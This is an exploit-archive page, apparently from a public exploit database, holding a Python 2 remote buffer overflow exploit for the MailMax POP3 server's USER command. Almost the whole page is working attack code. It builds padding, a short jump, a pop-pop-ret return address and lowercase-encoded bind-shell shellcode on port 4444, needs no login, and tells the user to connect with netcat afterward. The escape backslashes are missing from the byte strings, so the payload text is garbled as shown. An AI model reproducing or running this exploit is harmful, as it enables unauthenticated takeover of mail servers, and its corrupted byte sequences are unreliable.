MailMax <=v4.6 POP3 "USER" Remote Buffer Overflow Exploit (No Login Needed)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MailMax <=v4.6 POP3 "USER" Remote Buffer Overflow Exploit (No Login Needed)
# Published : 2012-03-30
# Author :
# Previous Title : TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCh
# Next Title : UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow

#!/usr/bin/python

# MailMax <=v4.6 POP3 "USER" Remote Buffer Overflow Exploit (No Login Needed)
# Newer version's not tested, maybe vulnerable too
# A hard one this, the shellcode MUST be lowercase. Plus there are many opcode's that break 
# the payload and opcodes that gets changed, like "xc3" gets converted to "xe3", and "xd3" gets converted to "xf3"
# written by localh0t
# Date: 29/03/12
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar
# Tested on: Windows XP SP3 Spanish (No DEP)
# Targets: Windows (All) (DEP Disabled)
# Shellcode: Bindshell on port 4444 (Change as you wish) (Lowercase Only, use EBX as baseaddr)

from socket import *
import sys, struct, os, time

if (len(sys.argv) < 3):
	print "nMailMax <=v4.6 POP3 "USER" Remote Buffer Overflow Exploit (No Login Needed)"
        print "n	Usage: %s <host> <port> n" %(sys.argv[0])
	sys.exit()

print "n[!] Connecting to %s ..." %(sys.argv[1])

# connect to host
sock = socket(AF_INET,SOCK_STREAM)
sock.connect((sys.argv[1],int(sys.argv[2])))
sock.recv(1024)
time.sleep(5)

buffer = "USER "
buffer += "A" * 1439 # padding
buffer += "xEBx06x90x90" # Short jmp (6 bytes)
buffer += "x86xb3x02x10" # pop | pop | ret 1c , dbmax2.dll
buffer += "x90" * 8 # nops (just to be sure)

# popad's, so esp => shellcode
buffer += "x61" * 145
# nop's to align
buffer += "x90" * 11
# and ebx,esp
buffer += "x21xe3" 
# or ebx,esp
buffer += "x09xe3" 
# at this point, ebx = esp. The shellcode is lowercase (with numbers), baseaddr = EBX
buffer += ("j314d34djq34djk34d1431s11s7j314d34dj234dkms502ds5o0d35upj0204c40jxo2925k3fjeok95718gk20bn8434k6dmcoej2jc3b0164k82bn9455x3bl153l87g7143n3jgox41l81f31lgox5eog2dm8k5831d345f1kj9nb0491j0959ekx4c89557818332e7g828ko45xn94dn32dm2915kkgo385132e8g15mk34k2347koe0b2x0b3xlf3docn8kfj0428f591b3ck33530n0o16eo93191942kl53fnbn8o3jk1k907xjc085eo89k4b1f6dj145l4949k1338931e4bo3lkox415g2ko03e6c44943g83jg3169k02dm0nf382gn3n9j9l18433410k3cn29e70kk0e2cjcn94k91k1mxm9310839kf34mg0d0k846eoe8kmc7gj843nemkn1ld234323l9787f623f3f6199823kox0xok492890nclkn3895510j2je945982745c6c981e954g748enx7dlfl419k01914745b08og8ej03xkcj3540b4045k481jg834872lk3gm420jd241e5fkc4co8729948k0md98o27b625e893b6co54f426c3d9k8c7kn853905e48kf699d7f22oe6xn02gjx00jc188g58l4k5mf850e7e9479l8086bjd09lxnb70384d0e8elfoc938k3cm3j27cm335403b794f9b6el")

buffer += "x90" * 2000
buffer += "rn"
print "[!] Sending exploit..."
sock.send(buffer)
sock.close()
print "[!] Exploit succeed. Now netcat %s on port 4444n" %(sys.argv[1])
sys.exit()